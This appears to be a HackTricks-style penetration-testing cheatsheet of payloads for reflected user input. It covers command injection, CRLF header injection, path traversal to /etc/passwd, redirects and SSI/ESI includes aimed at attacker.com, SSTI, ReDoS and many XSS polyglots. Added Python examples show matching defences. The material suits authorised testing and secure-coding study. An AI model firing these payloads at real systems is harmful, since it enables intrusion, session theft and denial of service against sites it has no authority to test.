Reflecting Techniques - PoCs and Polyglots CheatSheet
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF format, check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The goal of these PoCs and polyglots is to give the tester a quick overview of the vulnerabilities they may be able to exploit if their input is somehow reflected in the response.
{% hint style="warning" %} This cheatsheet does not propose a comprehensive list of tests for each vulnerability, only some basic ones. If you are looking for more comprehensive tests, go to the page of each proposed vulnerability. {% endhint %}
{% hint style="danger" %} You won't find Content-Type-dependent injections such as XXE here, because you will usually try those yourself if you find a request that sends XML data. You also won't find database injections here, because even if some content is reflected, exploitation depends heavily on the technology and structure of the backend database. {% endhint %}
Polyglot list
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Client Side Template Injection
Basic tests
{{7*7}}
[7*7]
Polyglots
A polyglot is a single input that is interpreted in several ways depending on the context it lands in. In this cheatsheet it means one payload string that stays syntactically valid across several template syntaxes, quoting styles or tag positions, so it can trigger the vulnerability whichever context reflects the input.
Polyglots are built by combining fragments that different parsers read differently; a delimiter that is a comment opener for one engine is plain text for another, and the parts that survive each parser are what fire. They are a quick first probe, not a replacement for the context-specific tests on each vulnerability's page: once a polyglot shows a reaction, narrow down which fragment the application actually interpreted.
{{7*7}}[7*7]
Command Injection
Basic tests
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
Polyglots
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
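The basic tests above only work because the parameter is pasted into a command string that a shell then re-parses. The following added example (not code from the page or from HackTricks) models that re-parsing with a deliberately simplified shell reader, shows the argv form that makes the same value a single literal argument, and includes the input check a WAF or framework would apply after URL decoding (`%0A` becoming a newline). `shell_view`, `safe_argv` and `has_shell_metachars` are names chosen for this example; nothing in it executes a shell.

```python
import re
import shlex
from urllib.parse import unquote

# Characters a POSIX shell treats as command separators or substitutions.
SHELL_META = set(";|&`$\n")


def vulnerable_command(filename: str) -> str:
    """The string a shell=True call would hand to /bin/sh when the parameter is concatenated."""
    return f"cat {filename}"


def safe_argv(filename: str) -> list:
    """Argument vector for subprocess.run(argv) with no shell: the whole value is one argument."""
    return ["cat", filename]


def quoted_command(filename: str) -> str:
    """If a shell string is unavoidable, shlex.quote wraps the value so metacharacters are literal."""
    return f"cat {shlex.quote(filename)}"


def shell_view(cmd: str) -> dict:
    """Simplified model of how a shell reads an UNQUOTED command line (constructed for the example,
    it ignores quoting rules): commands are split on ; | || & && and newline, and $(...) or `...`
    are collected as command substitutions that run before the main command."""
    substitutions = re.findall(r"\$\(([^)]*)\)|`([^`]*)`", cmd)
    commands = [c for c in re.split(r"\s*(?:\|\||&&|[;|&\n])\s*", cmd) if c]
    return {
        "commands": commands,
        "substitutions": [a or b for a, b in substitutions],
    }


def has_shell_metachars(value: str) -> bool:
    """Detection-side check on the raw parameter; URL decoding first so %0A counts as a newline."""
    return any(c in SHELL_META for c in unquote(value))


if __name__ == "__main__":
    # Constructed inputs: the page's basic tests plus one benign filename.
    for probe in [";ls", "||ls;", "|ls;", "&&ls;", "&ls;", "%0Als", "`ls`", "$(ls)", "report.txt"]:
        decoded = unquote(probe)
        print(repr(probe), has_shell_metachars(probe), shell_view(vulnerable_command(decoded)))
    print(quoted_command(";ls"), safe_argv(";ls"))
```

The `shell_view` model is intentionally naive (it does not understand quotes), which is why the safe variants are checked by their output strings rather than by feeding them back into it.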
CRLF
Basic tests
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
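What the first CRLF probe does once it is URL-decoded, as an added example that is not code from the page: a redirect builder that concatenates the parameter into the response head ends up emitting a second `Location` header, while the same builder with the check a framework should enforce (no CR or LF in any header value) refuses the input. The response layout, the `/next?from=` parameter and the helper names are assumptions made for this example.

```python
from urllib.parse import unquote

# Constructed: the page's first CRLF probe exactly as it would appear in a query string.
PROBE = "%0d%0aLocation:%20http://attacker.com"
DECODED = unquote(PROBE)  # "\r\nLocation: http://attacker.com"


def build_response_vulnerable(target: str) -> str:
    """Naive 302 builder: the already URL-decoded parameter lands in the head unchecked."""
    return f"HTTP/1.1 302 Found\r\nLocation: /next?from={target}\r\n\r\n"


def build_response_safe(target: str) -> str:
    """Same builder with the check every header-setting API should perform."""
    if "\r" in target or "\n" in target:
        raise ValueError("CR/LF in header value rejected")
    return f"HTTP/1.1 302 Found\r\nLocation: /next?from={target}\r\n\r\n"


def parse_head(raw: str) -> list:
    """Split a response head into (name, value) pairs the way a client would; the status line is dropped."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def header_values(raw: str, name: str) -> list:
    """All values carried by one header name; more than one Location is the injection signature."""
    return [v for n, v in parse_head(raw) if n == name.lower()]


if __name__ == "__main__":
    print(header_values(build_response_vulnerable(DECODED), "Location"))
    try:
        build_response_safe(DECODED)
    except ValueError as exc:
        print("rejected:", exc)
```

Clients take the last `Location` they see, so the duplicate header is enough to turn a same-site redirect into an external one; the same header-value check also blocks the longer probes, which all begin with the same `%0d%0a`.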
Dangling Markup
Basic Tests
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
File Inclusion/Path Traversal
Basic tests
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
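The containment check that defeats every basic test above, as an added example (not the page's code): the candidate is URL-decoded, backslashes are treated as separators as Windows does, absolute, drive-letter and remote targets are refused outright, and whatever remains is resolved under the base directory and verified to still be inside it. The base directory `/srv/app/public` and the function name `resolve_under` are assumptions for this example.

```python
import re
from pathlib import Path, PurePosixPath
from typing import Optional
from urllib.parse import unquote

BASE = Path("/srv/app/public")  # assumed document root for the example


def resolve_under(base: Path, user_path: str) -> Optional[Path]:
    """Return the resolved file path if it stays inside base, otherwise None."""
    candidate = unquote(user_path).replace("\\", "/")  # Windows accepts backslash separators too
    if candidate.startswith("/") or "://" in candidate or re.match(r"^[A-Za-z]:", candidate):
        return None  # absolute, UNC-style, drive-letter or URL targets are never files under base
    rel = PurePosixPath(candidate)
    target = (base / rel).resolve()  # collapses every ../ lexically, no existence required
    try:
        target.relative_to(base.resolve())
    except ValueError:
        return None  # escaped the base directory
    return target


# Constructed list: the page's basic tests for this section.
PAGE_TESTS = [
    "/etc/passwd",
    "../../../../../../etc/hosts",
    "..\\..\\..\\..\\..\\..\\etc/hosts",
    "/etc/hostname",
    "C:/windows/system32/drivers/etc/hosts",
    "../../../../../../windows/system32/drivers/etc/hosts",
    "..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts",
    "http://asdasdasdasd.burpcollab.com/mal.php",
    "\\\\asdasdasdasd.burpcollab.com/mal.php",
]


def rejected_page_tests(base: Path = BASE) -> list:
    """Which of the page's probes the check refuses (all of them, see the assertions)."""
    return [t for t in PAGE_TESTS if resolve_under(base, t) is None]


if __name__ == "__main__":
    for t in PAGE_TESTS:
        print(repr(t), "->", resolve_under(BASE, t))
    print(resolve_under(BASE, "docs/../readme.txt"))
```

A `..` that stays inside the base (`docs/../readme.txt`) is still served, which is the point of resolving rather than blacklisting the string `..`; percent-encoded dots (`%2e%2e/`) are handled by decoding before the check.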
Open Redirect / Server Side Request Forgery
Basic tests
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
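The allowlist check these five probes are designed to break, as an added example (not code from the page): a substring or prefix match on the trusted hostname accepts `www.whitelisted.com.evil.com`, whereas parsing the URL and comparing the parsed hostname exactly, plus a scheme allowlist and a strict rule for relative paths, rejects every probe on the list. The allowlist contents and the function names are assumptions for this example.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.whitelisted.com"}  # assumed allowlist for the example


def naive_check(url: str) -> bool:
    """Substring match on the trusted name: the bug the page's probes look for."""
    return "www.whitelisted.com" in url


def is_safe_redirect(url: str) -> bool:
    """Accept same-site relative paths and absolute http(s) URLs whose host is exactly allowlisted."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: require a single leading slash. "//host" never reaches this branch
        # because urlsplit files it under netloc, and a bare "www.whitelisted.com" is a path.
        return url.startswith("/") and url[1:2] not in ("/", "\\")
    if parts.scheme.lower() not in ("http", "https"):
        return False  # javascript:, data: and any other scheme
    return (parts.hostname or "").lower() in ALLOWED_HOSTS


def page_probe_verdicts() -> dict:
    """Constructed: the page's basic tests, with the naive and the strict verdict side by side."""
    probes = ["www.whitelisted.com", "www.whitelisted.com.evil.com",
              "https://google.com", "//google.com", "javascript:alert(1)"]
    return {p: (naive_check(p), is_safe_redirect(p)) for p in probes}


if __name__ == "__main__":
    for probe, (naive, strict) in page_probe_verdicts().items():
        print(f"{probe!r:40} naive={naive} strict={strict}")
```

The strict check also refuses the bare `www.whitelisted.com` probe, since without a scheme it is a relative path, not the trusted host; legitimate callers pass either a path beginning with `/` or a full `https://` URL.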
ReDoS
Basic tests
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
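Why these three patterns are tests at all, as an added example (not the page's code): a quantified group around a quantified atom, such as the page's `([a-zA-Z]+)*$`, makes a backtracking engine try every way of splitting a run of letters once the final `$` fails, so matching time doubles with each extra character. The example measures that growth on constructed inputs of modest length and shows the rewrite (`[a-zA-Z]*$`, which matches the same strings) that keeps it linear. The lengths and helper names are choices made for this example.

```python
import re
import time

VULNERABLE = r"([a-zA-Z]+)*$"  # from the page's basic tests: nested quantifiers
LINEAR = r"[a-zA-Z]*$"          # same language, no nesting, no backtracking explosion


def time_match(pattern: str, text: str, repeats: int = 3) -> float:
    """Best-of-n seconds for a single match attempt (compilation excluded)."""
    compiled = re.compile(pattern)
    best = float("inf")
    for _ in range(repeats):
        start = time.perf_counter()
        compiled.match(text)
        best = min(best, time.perf_counter() - start)
    return best


def growth(pattern: str, lengths=(10, 15, 20)) -> list:
    """Timings for inputs of n letters followed by '!', so the anchor fails and the engine backtracks."""
    return [time_match(pattern, "a" * n + "!") for n in lengths]


if __name__ == "__main__":
    for label, pattern in (("vulnerable", VULNERABLE), ("linear", LINEAR)):
        print(label, [f"{t * 1000:.3f} ms" for t in growth(pattern)])
```

Python's `re` offers no step budget or timeout, so the defence is the rewrite itself (or an engine with a linear-time guarantee such as RE2); keep inputs to user-facing regexes short and avoid any pattern where a repeated group can itself repeat.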
Server Side Inclusion/Edge Side Inclusion
Basic tests
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Polyglots
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Server Side Request Forgery
The same tests used for Open Redirect can be used here.
Server Side Template Injection
Basic tests
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
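How to read the result of these probes (and of the client-side `{{7*7}}` / `[7*7]` tests earlier on the page), as an added example that is not code from the page: each probe embeds an arithmetic expression, and the response is classified as evaluated (the product appears where the probe was), reflected (the probe came back literally, possibly HTML-encoded) or absent. The example generalises the page's `7*7` to `1337*7` so that the expected value is unlikely to occur in a page by chance; the server stand-in `fake_app` is constructed for the example and evaluates only `{{ }}` expressions.

```python
import html
import re

# Probe syntaxes from the page's basic tests; EXPR stands for the arithmetic.
PROBE_SYNTAXES = ["{{EXPR}}", "${EXPR}", "<%= EXPR %>", "${{EXPR}}", "#{EXPR}", "[EXPR]"]


def make_probe(syntax: str, a: int = 1337, b: int = 7):
    """Return (probe string, expected product as text)."""
    return syntax.replace("EXPR", f"{a}*{b}"), str(a * b)


def classify(probe: str, expected: str, response: str) -> str:
    """'evaluated' if the product appears as a standalone number, 'reflected' if the probe
    came back literally (HTML entities are undone first), otherwise 'absent'."""
    body = html.unescape(response)
    if re.search(rf"(?<!\d){re.escape(expected)}(?!\d)", body):
        return "evaluated"
    if probe in body:
        return "reflected"
    return "absent"


def triage(send) -> dict:
    """Run every probe through send(probe) -> response body and map each syntax to its verdict."""
    verdicts = {}
    for syntax in PROBE_SYNTAXES:
        probe, expected = make_probe(syntax)
        verdicts[syntax] = classify(probe, expected, send(probe))
    return verdicts


def fake_app(probe: str) -> str:
    """Constructed stand-in for a server: renders {{a*b}} through a template engine, HTML-escapes the rest."""
    m = re.fullmatch(r"\{\{(\d+)\*(\d+)\}\}", probe)
    if m:
        return f"<p>Hello {int(m.group(1)) * int(m.group(2))}</p>"
    return f"<p>Hello {html.escape(probe)}</p>"


if __name__ == "__main__":
    for syntax, verdict in triage(fake_app).items():
        print(f"{syntax:14} {verdict}")
```

In a real engagement `send` would perform the HTTP request and return the body; a verdict of `evaluated` for exactly one syntax family also narrows down which template engine is in use, which is what decides the follow-up tests.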
Polyglots
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
XSLT Server Side Injection
Basic tests
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Polyglots
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Basic tests
Reflected XSS
Reflected XSS is the most common type of XSS attack. It occurs when user input is displayed directly on the page without any validation or sanitisation. An attacker can inject malicious code that will execute in the user's browser.
Reflected XSS is tested by entering the malicious code into an input field or URL parameter and observing whether that code is displayed on the page. If it is, the page is vulnerable to reflected XSS.
Stored XSS
Stored XSS occurs when the malicious code remains permanently saved on the server and is displayed every time the page loads. This type of XSS attack is especially dangerous because it can affect every user who visits the affected page.
To test for stored XSS, enter the malicious code into an input field or any other form of user input that is saved on the server. Then, when the page is reloaded, check whether the malicious code is displayed on the page.
DOM-based XSS
DOM-based XSS occurs when the malicious code executes directly in the browser's DOM (Document Object Model). This type of XSS attack happens when user input is used to manipulate the DOM of the page.
To test for DOM-based XSS, enter the malicious code into an input field or URL parameter that will be used to manipulate the DOM. Then observe whether the malicious code executes in the user's browser.
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
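The three basic tests above each target a different output context (attribute value, element text, URL), and the dangling-markup test `<br><b><h1>...` earlier on the page targets element text as well. The following added example (not code from the page) shows one encoder per context, which is the fix for all of them: entity-escaping for text and quoted attributes, JSON encoding with `</` broken for JavaScript string literals inside `<script>`, and a scheme allowlist for `href`. The `render_profile` fragment and the encoder names are assumptions made for this example.

```python
import html
import json
from urllib.parse import urlsplit


def in_text(value: str) -> str:
    """Element content: escape & < > " ' so no tag can start."""
    return html.escape(value, quote=True)


def in_attr(value: str) -> str:
    """Quoted attribute value: the same entities; escaping the quote is what defeats '" onclick=...'."""
    return html.escape(value, quote=True)


def in_script(value: str) -> str:
    """JavaScript string literal inside <script>: JSON-encode, then break '</' so '</script>' cannot
    close the block and '<!--' cannot open an HTML comment."""
    return json.dumps(value).replace("</", "<\\/").replace("<!--", "<\\!--")


def in_href(value: str) -> str:
    """URL attribute: allow only relative, http, https or mailto targets, then attribute-escape."""
    value = value.strip()
    if urlsplit(value).scheme.lower() not in ("", "http", "https", "mailto"):
        return "#"  # javascript: and other executable schemes are dropped
    return html.escape(value, quote=True)


def render_profile(name: str, bio: str, site: str) -> str:
    """Assumed page fragment with one user-controlled slot per context."""
    return (
        f"<h2>{in_text(name)}</h2>\n"
        f'<a href="{in_href(site)}" title="{in_attr(name)}">site</a>\n'
        f"<script>var bio = {in_script(bio)};</script>"
    )


if __name__ == "__main__":
    # Constructed inputs: the page's three basic tests plus the dangling-markup test.
    print(render_profile('" onclick=alert() a="', "</script><script>alert(1)</script>", "javascript:alert()"))
    print(in_text("<br><b><h1>THIS IS AND INJECTED TITLE </h1>"))
    print(in_text("'\"><img src=x onerror=alert(1) />"))
```

The rule the example encodes is that the escaping is chosen by where the value is written, not by what the value looks like; a single "sanitise everything on input" pass cannot be right for all four slots at once.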
Polyglots
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>